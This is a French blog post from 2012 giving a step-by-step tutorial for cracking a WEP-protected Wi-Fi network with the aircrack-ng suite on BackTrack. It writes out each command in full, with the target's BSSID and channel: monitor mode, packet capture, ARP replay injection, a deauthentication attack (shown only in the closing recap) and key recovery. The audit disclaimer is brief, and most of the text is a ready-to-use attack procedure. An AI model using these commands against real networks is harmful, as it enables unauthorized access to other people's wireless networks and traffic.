dimanche 9 septembre 2012

Cracker un réseau Wifi sécurisé (WEP) II





 crack hack wifi Cracker un réseau WiFi sécurisé (WEP)

Aujourd'hui je vais vous montrer comment cracker un réseau sans fil protégé avec une clef WEP peu importe sa taille, et pourquoi faire ? disant dans le cadre d’un audit de sécurité par exemple et non pas pour nuire à vos voisins, vous êtes avertis ! pour faire, nous utiliserons la suite air crack-ng disponible dans la distribution Linux BackTrack afin de gagner du temps.

Prérequis:

- Une carte Wifi compatible avec le mode monitoring et injection de paquets (lien)
- La suite air crack-ng (lien) disponible dans la distribution BackTrack (lien)

 

 

On commence:

1 – Démarrage de l’interface Wifi (wlan0) en mode monitor, afin d’intercepter le trafic réseau sans fil, même s’il n’est pas adressé à notre machine.

air mon-ng start wlan0

backtrack hack wifi wep 01 Cracker un réseau WiFi sécurisé (WEP)

2 – Démarrage d’un scan des réseaux sans fil disponibles, dans mon cas en utilisant l’interface mon0

airodump-ng mon0

backtrack hack wifi wep 02 Cracker un réseau WiFi sécurisé (WEP)

3 – Maintenant que j’ai les informations (et paramètres) du réseau sans fil ciblé :
ESSID : dark-box
                    BSSID : 00:1C:C5:0A:5C:05
Channel (CH) : 11
Je vais arrêter la précédente commande, et lancer une nouvelle plus précise avec les nouveaux paramètres, tout en enregistrant le trafic capturé dans un fichier output

1 #commande:
2 airodump-ng --channel 11 --write output --bssid 00:1C:C5:0A:5C:05 mon0
3
4 # explication:
5 airodump-ng --channel {numéro du channel} --write {nom du fichier de capture} --bssid {adresse MAC wifi du routeur} {interface wifi en mode monitoring}

backtrack hack wifi wep 03 Cracker un réseau WiFi sécurisé (WEP)

4 – Dans une nouvelle console, je vais procéder à l’injection de paquets ARP (aireplay) pour stimuler le réseau et accélérer la capture des IVs nécessaires pour la réussite de l’attaque.

1 # commande:
aireplay-ng --arpreplay -e dark-box -b 00:1C:C5:0A:5C:05 -h 00:1C:BF:AB:35:B5 mon0
3
4 # explication:
5 aireplay-ng --arpreplay -e {ESSID du routeur} -b {adresse MAC wifi du routeur} -h {adresse MAC wifi d'une station connectée au routeur} {interface wifi en mode monitor}
backtrack hack wifi wep 041 Cracker un réseau WiFi sécurisé (WEP)


 5 – Dans une autre nouvelle console, je lance air crack pour casser la clef WEP en définissant le fichier de capture output*.cap

1 air crack-ng output*.cap

backtrack hack wifi wep 06 Cracker un réseau WiFi sécurisé (WEP)


laissé tourner, et en moins de 10 minutes vous obtiendrez la clef WEP, ici dans mon cas elle a une longueur de 128 bits, et je peux l’utiliser par la suite pour me connecter au réseau Wifi attaqué.
backtrack hack wifi wep 07 Cracker un réseau WiFi sécurisé (WEP)
 
Récapitulatif des commandes :
1-root@imbh:~# airmon-ng start wlan0
2-root@imbh:~# airodump-ng mon0
3-root@imbh:~# airodump-ng --channel 11 --write output --bssid 00:1C:C5:0A:5C:05 mon0
4-root@imbh:~# aireplay-ng --arpreplay -e dark-box -b 00:1C:C5:0A:5C:05 -h 00:1C:BF:AB:35:B5 mon0
5-root@imbh:~# aireplay-ng --deauth 10 -a 00:1C:C5:0A:5C:05 -c 00:1C:BF:AB:35:B5 mon0
6-root@imbh:~# aircrack-ng output*.cap 

Mon article arrive à sa fin, il a a été rédigé en testant la sécurité de mon propre réseau sans fil, alors inutile de me pointer du doigt en me disant : t’es un vilain

En espérant qu’il vous a plu, je vous dis portez-vous bien et n’hésitez pas à me faire part de vos questions, ou autre..